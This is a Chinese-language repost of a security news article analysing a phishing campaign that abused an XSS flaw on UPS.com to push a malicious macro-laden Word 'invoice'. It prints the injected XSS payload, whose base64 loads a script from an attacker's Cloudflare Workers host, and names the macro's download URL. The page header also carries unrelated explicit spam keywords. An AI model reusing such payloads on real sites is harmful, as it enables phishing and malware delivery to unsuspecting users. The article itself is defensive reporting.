国产xxxx99真实实拍_久久不雅视频_高清韩国a级特黄毛片_嗯老师别我我受不了了小说

資訊專欄INFORMATION COLUMN

“以假亂真” 網(wǎng)絡(luò)釣魚活動巧妙使用 UPS.com XSS 漏洞分發(fā)惡意軟件

KoreyLee / 2121人閱讀

摘要:此漏洞允許威脅行為者通過遠(yuǎn)程工作人員分發(fā)惡意文檔,但使其看起來像是直接從下載的。目前顯示,的跨站漏洞已經(jīng)修復(fù)。而以上釣魚攻擊利用的是中第二普遍的安全問題,存在于近三分之二的應(yīng)用中。

.markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;overflow-x:hidden;color:#333}.markdown-body%20h1,.markdown-body%20h2,.markdown-body%20h3,.markdown-body%20h4,.markdown-body%20h5,.markdown-body%20h6{line-height:1.5;margin-top:35px;margin-bottom:10px;padding-bottom:5px}.markdown-body%20h1{font-size:30px;margin-bottom:5px}.markdown-body%20h2{padding-bottom:12px;font-size:24px;border-bottom:1px%20solid%20#ececec}.markdown-body%20h3{font-size:18px;padding-bottom:0}.markdown-body%20h4{font-size:16px}.markdown-body%20h5{font-size:15px}.markdown-body%20h6{margin-top:5px}.markdown-body%20p{line-height:inherit;margin-top:22px;margin-bottom:22px}.markdown-body%20img{max-width:100%}.markdown-body%20hr{border:none;border-top:1px%20solid%20#ffffd;margin-top:32px;margin-bottom:32px}.markdown-body%20code{word-break:break-word;border-radius:2px;overflow-x:auto;background-color:#fff5f5;color:#ff502c;font-size:.87em;padding:.065em%20.4em}.markdown-body%20code,.markdown-body%20pre{font-family:Menlo,Monaco,Consolas,Courier%20New,monospace}.markdown-body%20pre{overflow:auto;position:relative;line-height:1.75}.markdown-body%20pre>code{font-size:12px;padding:15px%2012px;margin:0;word-break:normal;display:block;overflow-x:auto;color:#333;background:#f8f8f8}.markdown-body%20a{text-decoration:none;color:#0269c8;border-bottom:1px%20solid%20#d1e9ff}.markdown-body%20a:active,.markdown-body%20a:hover{color:#275b8c}.markdown-body%20table{display:inline-block!important;font-size:12px;width:auto;max-width:100%;overflow:auto;border:1px%20solid%20#f6f6f6}.markdown-body%20thead{background:#f6f6f6;color:#000;text-align:left}.markdown-body%20tr:nth-child(2n){background-color:#fcfcfc}.markdown-body%20td,.markdown-body%20th{padding:12px%207px;line-height:24px}.markdown-body%20td{min-width:120px}.markdown-body%20blockquote{color:#666;padding:1px%2023px;margin:22px%200;border-left:4px%20solid%20#cbcbcb;background-color:#f8f8f8}.markdown-body%20blockquote:after{display:block;content:""}.markdown-body%20blockquote>p{margin:10px%200}.markdown-body%20ol,.markdown-body%20ul{padding-left:28px}.markdown-body%20ol%20li,.markdown-body%20ul%20li{margin-bottom:0;list-style:inherit}.markdown-body%20ol%20li%20.task-list-item,.markdown-body%20ul%20li%20.task-list-item{list-style:none}.markdown-body%20ol%20li%20.task-list-item%20ol,.markdown-body%20ol%20li%20.task-list-item%20ul,.markdown-body%20ul%20li%20.task-list-item%20ol,.markdown-body%20ul%20li%20.task-list-item%20ul{margin-top:0}.markdown-body%20ol%20ol,.markdown-body%20ol%20ul,.markdown-body%20ul%20ol,.markdown-body%20ul%20ul{margin-top:3px}.markdown-body%20ol%20li{padding-left:6px}.markdown-body%20.contains-task-list{padding-left:0}.markdown-body%20.task-list-item{list-style:none}@media%20(max-width:720px){.markdown-body%20h1{font-size:24px}.markdown-body%20h2{font-size:20px}.markdown-body%20h3{font-size:18px}}

一個巧妙的網(wǎng)絡(luò)釣魚活動利用UPS.com中的XSS漏洞來推送虛假和惡意的“發(fā)票”Word%20文檔。

UPS快遞公司(UPS%20Express,聯(lián)合包裹服務(wù)公司)是世界上最大的快遞承運(yùn)商與包裹遞送公司。公司創(chuàng)辦1907年,每天在全球200多個國家和地區(qū)提供物流服務(wù),年營業(yè)額超過500億美元。

網(wǎng)絡(luò)釣魚騙局最初是由安全研究人員丹尼爾·加拉格爾發(fā)現(xiàn)的,他假裝是一封來自UPS的電子郵件,聲稱一個包裹有“例外”,需要客戶取走。

這次網(wǎng)絡(luò)釣魚攻擊的突出之處在于,威脅行為者利用UPS.com的跨站攻擊漏洞,將該網(wǎng)站的常規(guī)頁面修改為看起來像一個合法的下載頁面。

此漏洞允許威脅行為者通過遠(yuǎn)程Cloudflare工作人員分發(fā)惡意文檔,但使其看起來像是直接從UPS.com下載的。

剖析%20UPS%20網(wǎng)絡(luò)釣魚騙局

這個電子郵件充滿了大量的合法鏈接,沒有執(zhí)行惡意行為。然而,這個追蹤號碼是一個鏈接到UPS網(wǎng)站的鏈接,其中包含一個XSS漏洞,當(dāng)頁面打開時,該漏洞會向瀏覽器注入惡意JavaScript。

UPS 網(wǎng)絡(luò)釣魚電子郵件

當(dāng)前無法加載圖像,因為攻擊者的站點(diǎn)已關(guān)閉

下面可以看到用于跟蹤號碼的URL經(jīng)過清理后的版本,原始的URL被進(jìn)一步混淆了。

網(wǎng)絡(luò)釣魚詐騙中使用的URL

這個URL有兩個有趣的字符串用作攻擊的一部分,其中第一項是以下base64編碼的字符串:

MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==

base64字符串包含來自威脅參與者的注釋,該注釋有助于解釋該字符串用于使URL變長,以隱藏附加到URL末尾的XSS利用查詢參數(shù)。

1%20jU57%20N33d%2070%20m4K3%207h15%20URL%204%20l177l3%20L0n93r%2070%20H1D3%20n3x7%20qU3rY%20P4R4M,%20y0u%204LR34Dy%20Kn0w%20WhY%20;)

第二點(diǎn)是當(dāng)用戶訪問UPS.com網(wǎng)站時注入的JavaScript跨站漏洞。

img%20src="x"%20onerror="Function(atob("JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=="))()

atob()函數(shù)中解碼的base64字符串包含Cloudflare工作人員腳本的URL,該漏洞將加載該腳本。

$.getScript("

Gallagher在Urlscan上捕獲的Cloudflare工作人員腳本,將導(dǎo)致UPS頁面顯示一條消息,表明有文件正在下載。

Cloudflare 工作腳本用作 UPS XSS 攻擊的一部分

XSS漏洞注入的Cloudflare worker腳本將導(dǎo)致UPS網(wǎng)站顯示下載頁面,如下所示。

利用導(dǎo)致UPS頁面顯示下載屏幕

最終,該頁面將從攻擊者的Cloudflare項目下載惡意的Word文檔[VirusTotal]。

這種網(wǎng)絡(luò)釣魚活動手段非常聰明,因為用戶訪問URL將看到一個合法的ups.com%20URL提示下載發(fā)票,這種策略可能會使受害者在打開發(fā)票時少一些懷疑,認(rèn)為這是UPS的真實文件。

目前顯示,UPS.com的跨站漏洞已經(jīng)修復(fù)。

神秘的假“發(fā)票”文件

下載的文件名為“invoice_1Z7301XR1412220178”,假裝是UPS的運(yùn)輸發(fā)票。當(dāng)打開文檔時,所有文本都將無法讀取,并且文檔會提示用戶“啟用內(nèi)容”以正確查看它。

惡意發(fā)票word文檔

啟用后,宏將嘗試下載文件divine-bar-3d75.visual-candy.workers.dev/blackhole.p…

但是,此URL不再有效,因此無法查看有效負(fù)載。

偽造的 UPS 發(fā)票中的宏

這種網(wǎng)絡(luò)釣魚騙局說明了威脅行為者在散布惡意文件時,不斷在發(fā)展和創(chuàng)新其技術(shù)手段,雖然郵件發(fā)送者清楚地顯示了一個可疑域名,但由XSS漏洞允許URL和下載頁面從UPS合法出現(xiàn),這會讓很多人信以為真。

根據(jù)CNVD(國家信息安全漏洞共享平臺)統(tǒng)計,軟件漏洞比例最高占全部網(wǎng)絡(luò)漏洞的80%,而在OWASP TOP 10安全漏洞中,60-70%的安全漏洞類型都是通過源代碼靜態(tài)分析技術(shù)檢測出來的,如XSS、注入漏洞、XXE等。而以上釣魚攻擊利用的XSS是OWASP TOP 10中第二普遍的安全問題,存在于近三分之二的應(yīng)用中。自動化技術(shù)可以自動發(fā)現(xiàn)一些XSS問題,特別是在一些成熟的技術(shù)中,如PHP、ASP.NET等。因此在軟件開發(fā)過程中,為了加強(qiáng)網(wǎng)絡(luò)安全建設(shè)提高軟件安全性,有必要通過靜態(tài)代碼檢測等工具檢測代碼缺陷及運(yùn)行時缺陷,并查找更多的已知/未知深度安全漏洞并及時修復(fù),這不但為現(xiàn)有的網(wǎng)絡(luò)防護(hù)手段做好重要補(bǔ)充,而且也能將安全問題修復(fù)成本降至最低。

參讀鏈接:

www.woocoom.com/b021.html?i…

www.bleepingcomputer.com/news/securi…

www.99lb.net/8382b.html

文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。

轉(zhuǎn)載請注明本文地址:http://specialneedsforspecialkids.com/yun/118560.html

相關(guān)文章

  • 金融科技行業(yè)網(wǎng)絡(luò)安全威脅概覽

    摘要:在眾多端點(diǎn)威脅中,針對金融部門的最常見的持續(xù)攻擊是網(wǎng)絡(luò)釣魚和勒索軟件攻擊。通過研究,影響金融行業(yè)的勒索軟件攻擊和數(shù)據(jù)泄露的趨勢表明,勒索軟件組是最活躍的。針對金融機(jī)構(gòu)的累計攻擊次數(shù)達(dá)起,涉及個勒索軟件組織。 .markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;ove...

    xietao3 評論0 收藏0
  • [面試專題]前端需要知道的web安全知識

    摘要:攻擊方式端口掃描攻擊洪水攻擊洪水攻擊跳轉(zhuǎn)攻擊防范手段保證服務(wù)器系統(tǒng)的安全確保服務(wù)器軟件沒有任何漏洞,防止攻擊者入侵。 前端需要知道的web安全知識 標(biāo)簽(空格分隔): 未分類 安全 [Doc] Crypto (加密) [Doc] TLS/SSL [Doc] HTTPS [Point] XSS [Point] CSRF [Point] 中間人攻擊 [Point] Sql/Nosql ...

    ivydom 評論0 收藏0

發(fā)表評論

0條評論

最新活動
閱讀需要支付1元查看
<